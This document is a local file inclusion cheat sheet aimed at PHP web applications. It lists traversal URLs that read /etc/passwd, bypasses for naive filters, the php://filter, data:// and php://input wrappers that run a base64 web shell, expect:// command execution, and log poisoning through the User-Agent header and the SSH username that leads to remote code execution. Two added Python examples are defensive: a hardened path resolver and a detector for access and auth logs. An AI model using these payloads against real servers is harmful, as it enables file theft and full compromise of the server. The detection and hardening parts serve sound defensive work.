Linux
Use the following to check whether an LFI is possible on a Linux machine when no filtering is in place:
http://<SERVER_IP>:<PORT>/index.php?language=/../../../../etc/passwd
Windows
Use the following to check whether an LFI is possible on a Windows machine when no filtering is in place:
http://<SERVER_IP>:<PORT>/index.php?language=/../../../../../windows/boot.ini
Non Recursive Filter
Developers may try to filter LFI vulnerabilities by replacing '../' with '' in a single, non-recursive pass:
$language = str_replace('../', '', $_GET['language']);
Because the replacement runs only once, stripping the inner '../' from '....//' leaves a fresh '../' behind, so we can bypass it as follows:
http://<SERVER_IP>:<PORT>/index.php?language=....//....//....//....//etc/passwd
URL-Encoding
Developers may try to filter LFI vulnerabilities by detecting LFI-related characters such as a dot '.' or a slash '/'. To bypass this we can URL-encode the dots and slashes. Plain payload:
http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/passwd
The same payload URL-encoded:
http://<SERVER_IP>:<PORT>/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
Null Byte
(Obsolete) PHP versions before 5.5 (more than 11 years ago) were vulnerable to null byte injection: appending a null byte (%00) to the string terminates it, so anything after it is ignored.
http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/passwd%00
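Added example, not part of the original cheat sheet: a Python model of the three filter weaknesses above (the non-recursive str_replace, a character blocklist applied to the still-encoded value, and null-byte truncation) next to a hardened resolver that decodes first, canonicalises the path, confines it to one directory and applies an allowlist. BASE_DIR, ALLOWED_FILES and the function names are assumptions made for the example; the naive functions mirror the PHP logic described in the text rather than any real project's code.

```python
import os
import urllib.parse
from typing import Optional

# Assumed layout for the example: include targets live under this directory and
# only these file names are legitimate values for ?language=.
BASE_DIR = "/var/www/html/languages"
ALLOWED_FILES = {"en.php", "de.php", "fr.php"}


def naive_strip_filter(value: str) -> str:
    """Model of the non-recursive PHP filter str_replace('../', '', $value).
    PHP and Python both replace each match once in a single left-to-right pass,
    so '....//' leaves a fresh '../' behind once the inner '../' is removed."""
    return value.replace("../", "")


def naive_char_blocklist(raw_value: str) -> bool:
    """Model of a blocklist that looks for '.' and '/' in the *raw* query value.
    Returns True when the value is rejected. It never sees the decoded form,
    so a fully percent-encoded payload passes."""
    return "." in raw_value or "/" in raw_value


def resolve_include(raw_value: str, base_dir: str = BASE_DIR,
                    allowed: frozenset = frozenset(ALLOWED_FILES)) -> Optional[str]:
    """Hardened counterpart: decode, reject null bytes, canonicalise, confine to
    base_dir, then apply an allowlist. Returns the absolute path to include,
    or None when the request must be refused."""
    value = urllib.parse.unquote(raw_value)
    if "\x00" in value:          # truncation trick never reaches the filesystem
        return None
    base_real = os.path.realpath(base_dir)
    # realpath normalises '..' and symlinks. An absolute user value replaces
    # base_real inside os.path.join; the containment check below catches that.
    candidate = os.path.realpath(os.path.join(base_real, value))
    if os.path.commonpath([candidate, base_real]) != base_real:
        return None              # escaped the directory
    if os.path.basename(candidate) not in allowed:
        return None              # not one of the known language files
    return candidate


def demo() -> dict:
    """Run the cheat sheet's payloads through the naive and hardened checks."""
    bypass = "....//....//....//....//etc/passwd"
    encoded = "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64"
    return {
        "naive_strip_output": naive_strip_filter(bypass),            # '../../../../etc/passwd'
        "blocklist_rejects_encoded": naive_char_blocklist(encoded),  # False: payload passes
        "hardened_bypass": resolve_include(bypass),                  # None
        "hardened_encoded": resolve_include(encoded),                # None
        "hardened_nullbyte": resolve_include("en.php%00.txt"),       # None
        "hardened_legit": resolve_include("en.php"),                 # .../languages/en.php
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

The ordering inside resolve_include is the point: decode before checking, check the canonical path rather than the raw string, and finish with an allowlist so that even a traversal the containment check somehow missed cannot select an arbitrary file.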
PHP Filter
In PHP applications, the php://filter wrapper can be used to read source code, logs, configuration files, etc.; with convert.base64-encode the PHP source is returned encoded instead of being executed:
http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=index.php
PHP Data
In PHP applications, the data:// wrapper can be used to include external data. We can Base64-encode a PHP web shell <?php system($_GET["cmd"]); ?>, URL-encode the result, and execute the code through the data wrapper:
http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
PHP Input
In PHP applications, the php://input wrapper is a read-only stream that exposes the raw request body, so PHP code sent as the POST body gets included:
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
PHP Expect
In PHP applications, streams opened via the expect:// wrapper provide access to a process's stdin, stdout and stderr via a PTY:
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
Apache Logs
The Apache web server writes several log files, such as access.log and error.log. The access.log file records information about every request made to the server, including each request's User-Agent header. As we control the User-Agent header of our requests, we can use it to poison the server logs. By default, Apache logs are located in /var/log/apache2/ on Linux and in C:\xampp\apache\logs\ on Windows.
Poison the User-Agent in access logs:
curl http://<SERVER_IP>:<PORT>/ -A "<?php system($_GET['cmd']);?>"
Then include the Apache access log inside the web application:
http://<SERVER_IP>:<PORT>/index.php?language=/var/log/apache2/access.log&cmd=id
Nginx Logs
The Nginx web server writes several log files, such as access.log and error.log. The access.log file records information about every request made to the server, including each request's User-Agent header. As we control the User-Agent header of our requests, we can use it to poison the server logs. By default, Nginx logs are located in /var/log/nginx/ on Linux and in C:\nginx\log\ on Windows.
Poison the User-Agent in access logs:
curl http://<SERVER_IP>:<PORT>/ -A "<?php system($_GET['cmd']);?>"
Then include the Nginx access log inside the web application:
http://<SERVER_IP>:<PORT>/index.php?language=/var/log/nginx/access.log&cmd=id
PHPSESSID
Most PHP web applications use PHPSESSID cookies, which identify user-specific data held on the back-end so the web application can keep track of user details across requests. These details are stored in session files on the back-end, saved in /var/lib/php/sessions/ on Linux and in C:\Windows\Temp\ on Windows. The sessions are stored in /var/lib/php5/sess_[PHPSESSID] or /var/lib/php/sessions/sess_[PHPSESSID] files.
We can include our own PHPSESSID session file through the LFI to check whether the session contains any variables that can be poisoned:
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
Current Process Environment Variables
The /proc/self directory is a special symbolic link that refers to the process directory of the currently running process. The /proc/self/environ file contains the environment variables of the current process. This file may contain sensitive information or be susceptible to log poisoning.
Log poisoning via the User-Agent, example request:
GET /vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
SSH Logs
The file /var/log/auth.log records authentication-related SSH events and information, such as user logins, logouts, and authentication failures. As /var/log/auth.log contains sensitive authentication-related information, it is typically only accessible by privileged users (e.g., root or users in the adm group).
Try to SSH into the box using PHP code as the username, <?php system($_GET["cmd"]);?>:
ssh <?php system($_GET["cmd"]);?>@10.10.10.10
Then include the SSH log file inside the web application:
http://<SERVER_IP>:<PORT>/index.php?language=/var/log/auth.log&cmd=id
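Added example, not from the original page: Python detection logic that scans constructed Apache/Nginx-style access log lines and auth.log lines for the indicators covered in the sections above, from the wrapper tricks (php://, data:, expect://) through log, environ and session-file inclusion, and PHP tags planted in the User-Agent or the SSH username. The sample log lines, the indicator list and the function names are constructed for the example. Two caveats useful when triaging such hits: data:// and php://input inclusion only work when allow_url_include is On, and expect:// needs the expect extension installed; php://filter needs neither, which is why it is the most reliable of the wrappers on a default install.

```python
import re
import urllib.parse
from typing import Dict, List, Optional

# Apache/Nginx "combined" log format, e.g.
# 10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?language=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators drawn from the techniques on this page, checked against the
# URL-decoded request path (order determines the order of reported hits).
PATH_INDICATORS = [
    ("traversal",      re.compile(r"\.\.[/\\]")),                   # '....//' contains '../' too
    ("php_wrapper",    re.compile(r"(?i)\b(php|expect|phar|zip)://")),
    ("data_wrapper",   re.compile(r"(?i)\bdata:")),
    ("sensitive_path", re.compile(r"(?i)(/etc/passwd|/proc/self/environ|/var/log/|"
                                  r"/var/lib/php|sess_[a-z0-9]{20,}|boot\.ini)")),
    ("null_byte",      re.compile(r"\x00")),
]
PHP_TAG_RE = re.compile(r"<\?(php\b|=)", re.I)   # web-shell tags used for log poisoning


def deep_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_access_line(line: str) -> Optional[Dict]:
    """Return a finding for one access-log line, or None if it is benign or unparseable."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    path = deep_decode(m.group("path"))
    hits: List[str] = [name for name, rx in PATH_INDICATORS if rx.search(path)]
    if PHP_TAG_RE.search(m.group("ua")):
        hits.append("ua_poisoning")   # PHP code planted in User-Agent for later inclusion
    if not hits:
        return None
    return {"ip": m.group("ip"), "path": path, "status": m.group("status"), "indicators": hits}


def scan_access_log(lines) -> List[Dict]:
    return [f for f in (analyze_access_line(ln) for ln in lines) if f]


def scan_auth_log(lines) -> List[str]:
    """auth.log variant: a PHP tag inside the logged SSH username is the poisoning signal."""
    return [ln for ln in lines if "sshd" in ln and PHP_TAG_RE.search(ln)]


# Constructed sample data for the example (not real traffic).
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?language=....//....//....//....//etc/passwd HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:57:11 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']);?>"
10.0.0.5 - - [10/Oct/2023:13:57:15 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:58:00 +0000] "GET /index.php?language=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""
SAMPLE_AUTH_LOG = """\
Oct 10 14:01:02 web sshd[2201]: Invalid user <?php system($_GET["cmd"]);?> from 10.0.0.5 port 51234
Oct 10 14:01:09 web sshd[2203]: Accepted publickey for deploy from 10.0.0.20 port 51240 ssh2
"""

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG.splitlines()):
        print(finding)
    for line in scan_auth_log(SAMPLE_AUTH_LOG.splitlines()):
        print("auth.log poisoning:", line)
```

Decoding before matching is what makes the second sample line visible; matching on the raw request string would miss it entirely. The "ua_poisoning" hit on the fourth line is the one to chase first, since a later request including the log (the fifth line) completes the chain.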